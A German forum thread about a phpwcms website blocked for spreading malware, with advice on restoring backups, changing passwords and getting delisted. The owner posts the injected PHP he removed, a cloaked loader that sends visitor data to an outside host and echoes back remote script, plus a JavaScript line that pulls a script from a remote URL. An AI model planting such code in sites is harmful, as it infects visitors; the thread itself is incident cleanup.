Webseite gesperrt wg Malwareverbreitung

[andalucia]

Hallo,
mich hat es auch erwischt, Webseite gesperrt wegen Malwareverbreitung. Den Artikel hier im Forum bezüglich Malware habe ich schon durchgelesen, aber ich weiß nicht so recht was man nun tun muss.
Ein Anruf beim Provider St__to brachte wenig. "Es sei unverantwortlich Verzeichnisrechte auf 777 zu haben. Außerdem müsse in der php.ini safe mode auf "on" sein."

So schaut es aus, die beschriebenen js Dateien sind modifiziert bzw installiert. Alles mit Datum 2014.

Die Bilder wurden gelöscht, da google in chrome Browsern automatisch auf Warnseiten leitet


Fragen:
Was tut man nun um das zu bereinigen?
Woher kommt das und wie kann man das in Zukunft vermeiden? Das FTP-Passwort habe ich schon mal geändert...

Lieben Gruß
Klaus

[Oliver Georgi]

Blödsinnige Aussage des Providers. Beides führt erst mal nicht zu Problemen, solange der Provider sein System ordentlich abgedichtet hätte. Hat er aber nicht, scheint nicht mal einen ordentlichen Virenscanner im Einsatz zu haben. Und wie Du siehst, hat es Dateien getroffen, die eben NICHT! 777 bzw. 666 gesetzt sind, sondern JavaScript Dateien mit 644. Und die sind nur beschreibbar, wenn der Provider Scheiße gebaut hat bei der Systemkonfiguration bzw. wenn jemand per FTP draufgeht oder das System sonstige Lücken hat.

Es hilft nur das Bereinigen der Dateien oder Rückspielen eines Backups. Dann unbedingt den eigenen Rechner auf Malware testen.

Welcher Provider war es denn?

[andalucia]

Hallo Oliver,
danke erst mal. Provider ist Strato. Zuerst kam eine Sperrung durch Guckel, dann vom Provider. Da ich seit 1,5 Jahren als Techniker
weltweit unterwegs war hatte ich an der Seite auch nichts verändert, zumindest dieses Jahr nicht. Definitiv kein FTP.
Eine Infizierung durch meinen Privatrechner scheidet damit aus. War eh nur mit einem relativ hoch gesichertem Firmen NB unterwegs. FTP ports etc sind da disabled.
Wie bereinige ich denn nun? Ich weiß ja zZ noch nicht mal welche Version ich drauf habe, da das gesamte System gesperrt ist.
Der letzte Update der phpwcms-Version war vom 22.05.2012. Was war denn da phpwcmsmässig aktuell?

Ich lade grad von Strato einen Backup vom 2.3.14 runter. Klingt erst mal gut.
Aber, Frage, was ist mit den beiden Dateien aus dem 2-ten Bild?
js.mootools-1.4.default.php
js.jquery.default.php

Die sind beide vom 21.1.14. Brauche ich die auch neu?


LG
Klaus

[andalucia]

OK, der Backup vom 2.3.14 ist restored. Was mir aber noch Kopfzerbrechen bereitet sind die beiden genannten Dateien vom 21.1.14...?
Die liegen zeitlich damit genau zwischen dem Backup vom 2.3.14 und der hier im Forum genannten Malware-Attacken ab dem 15.1.14
Muss da noch was passieren bevor ich da eine Freischaltung bei Provider und Guckel beantrage? Soll ich sie mal posten?
Mein Bauch sagt mir besser erst mal prüfen als das man dann den ganzen Sch__ von vorne hat

LG
Klaus

[Oliver Georgi]

nimm die Dateien und lade sie auf Virustotal. Vergleiche die PHP-Dateien doch einfach mal mit dem Backup-Stand. Dann siehst Du, was da Sache ist. Steht sicher oben/unten irgendwelcher kryptische Kram drinne.

[kukki]

Wie mir scheint hast Du auch das Pech gehabt, auf Grund einiger vernachlässigter Sicherheit auf einem Provider in den sauren Apfel beißen zu müssen.
Wenn es Dich tröstet, Du hast nur eine Website zu bearbeiten.

Die Version bekommst Du raus, wenn Du beim Login, was eigentlich noch funktionieren müßte, auf HOME klickst und ganz unten die Version/ Revision abliest ... da steht diese.
Desweiteren: seit 05.01.2014 sind diese Probleme auf vieieielen Providern aufgetreten. eMailkonten und FTP-Konten wurden geknackt und über diesen Weg wurde Schadcode eingefügt.

Ich habe darauf hingewiesen, wie man der Sache wieder Herr wird. oder/und auch hier. Letztere Seite stellt Dir kostenlos ein Bots dafür zur Verfügung.

Hinweis:
Ändere kurzfristig Deine FTP-Zugangscodes und Deine eMail-Passworte

Und zum Schluß musst Du über Google-WebmasterTools Deine Website wieder freischalten. Dort genau nachlesen, wie es funktioniert. Dauert ein-zwei Tage und die Website ist wieder frei!
Ich würde einfach mal Deinem Provider Tschüüüüüß sagen.

[andalucia]

Kukki,
das mit der Version weiß ich. Nur - wie bereits beschrieben - ist die Seite komplett gesperrt => kein Login möglich.
Dazu muss Strato sie erst mal wieder freischalten... Dann erst kommen die Guckel Webmastertools.
Backup ist restored, alle Passwörter sind geändert, Freischaltung ist beantragt.
Warten auf Antwort...

LG
Klaus

[andalucia]

Das kam mir auch komisch vor, habe ich in den beiden verdächtigen Files gefunden und gelöscht:

Code: Select all

<?php
#98d7cb#
error_reporting(0); ini_set('display_errors',0); $wp_axlv96632 = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_axlv96632) && !preg_match ('/bot/i', $wp_axlv96632))){

$wp_axlv0996632="http://"."web"."basefont".".com/font"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_axlv96632);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_axlv0996632);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_96632axlv = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_96632axlv,1,3) === 'scr' ){ echo $wp_96632axlv; }
#/98d7cb#
?>
<?php

?>

[kukki]

Die Files musst Du nicht löschen, sondern den angehängten Schadecode!

Und Du kommst nicht einmal per FTP an Deine Seiten ran? Ich glaub's nicht wirklich Das ist nicht ganz koscher, was Dein Provider da macht. Auch das Sperren einer Seite ist etwas übertrieben!

[andalucia]

Logo habe ich nur den angehängten Code gelöscht. FTP geht, hatte ja den Backup übertragen, jedoch kein Login ins CMS oder Zugriffe per Browser in zB Work-Directories. Alles www ist tot.

LG

[nameless1]

Das ist nicht ganz koscher, was Dein Provider da macht. Auch das Sperren einer Seite ist etwas übertrieben!

nicht unbedingt, bevor die ganze ip oder gar das c-range wegen einer seite irgendwo geblockt werden und tausende in mitleidenschaft zieht.

[top]

In dem Zusammenhang würde mich interessieren, ob andere Seiten auf dem Server ebenfalls deaktiviert wurden.

Mit Tools wie dem hier kann man sich anzeigen lassen, welche Domains ebenfalls unter der IP erreichbar sind:
http://www.yougetsignal.com/tools/web-s ... eb-server/

[andalucia]

Das kam vor 1 Stunde, Seite geht aber noch nicht:
"Wir haben Ihre Domain abc123nnn.de unter der Kundennummer 1234567890 entsperrt. In Kürze ist Ihre Internetpräsenz wieder in vollem Umfang verfügbar."

Wg Nachfrage
Es waren nur Domains gesperrt welche CMS verwendeten. Andere reine html-Domains waren nicht gesperrt.

LG
Klaus

[andalucia]

Webseite online, aber...
grrr, Google meldet immer noch infiziert, grrr...

Habe jetzt noch in /template/inc_js/ bei allen 6 js-files das hier gefunden:

Code: Select all

document.write("<script type='text/javascript' src='http://example.com/ZKVdvYC7.php?id=17019822'></"+ "script>");

[update]

Ich habe, mit Deiner vorausgesetzten Erlaubnis, mal den code durch "...." ersetzt...